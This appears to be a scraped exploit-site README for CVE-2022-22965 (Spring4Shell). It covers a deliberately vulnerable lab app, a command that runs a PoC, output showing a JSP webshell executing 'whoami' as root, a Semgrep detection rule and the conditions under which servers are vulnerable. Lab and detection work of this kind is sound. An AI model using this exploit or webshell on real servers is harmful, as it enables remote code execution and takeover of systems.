Share
## https://sploitus.com/exploit?id=701F758F-BBA0-582C-AE23-AA3C515F6A9F
CVE-2022-22965 - vulnerable app and PoC
---------------------------------------
## Trial & error
```bash
$ docker rm -f rce; docker build -t rce:latest . && docker run -d -p 8080:8080 --name rce rce:latest && sleep 5 && python poc.py
```
### Output example
```
rce
sha256:f626a2190dc0790c610afd4f12a4b2482b6a726d671fdac1432275de89c07cd6
1a048e5725f754d331de9491d0750c4c7a163472dea1fd1554edccfd00d7f6e5
deploy <Response [200]>
webshell <Response [404]>
webshell <Response [404]>
webshell <Response [404]>
webshell <Response [404]>
webshell <Response [500]>
webshell http://localhost:8080/tomcatwar.jsp?cmd=whoami
root
```
## Identification with [Semgrep](https://semgrep.dev/)
```bash
$ semgrep --config=semgrep-rule.yml .
```
[Semgrep rule and test cases](https://semgrep.dev/s/DDuarte:cve-2022-22965)
### Output example
```
Findings:
src/main/java/com/example/demo/controller/IndexController.java
cve-2022-22965
Semgrep found a match
14โ @RequestMapping("/index")
15โ public void index(EvalBean evalBean) {
16โ
17โ }
Ran 1 rule on 3 files: 1 finding.
```
## Vulnerable app requirements[^1]
- JDK 9 or above
- Standalone Tomcat (no Embedded Tomcat) with WAR deployment
- Any Spring version before 5.3.18 / 5.2.20 (Spring Boot before 2.5.12 / 2.6.6)
- No blocklist on WebDataBinder / InitBinder
- Parameter bind with POJOs directly (no @RequestBody, @RequestQuery, etc.)
- Writeable file system (e.g webapps/ROOT)
[^1]: Assuming exploits similar to the known PoCs. There might be other gadgets...
## Sources
- https://twitter.com/vxunderground/status/1509170582469943303 / https://github.com/craig/SpringCore0day
- https://github.com/fengguangbin/spring-rce-war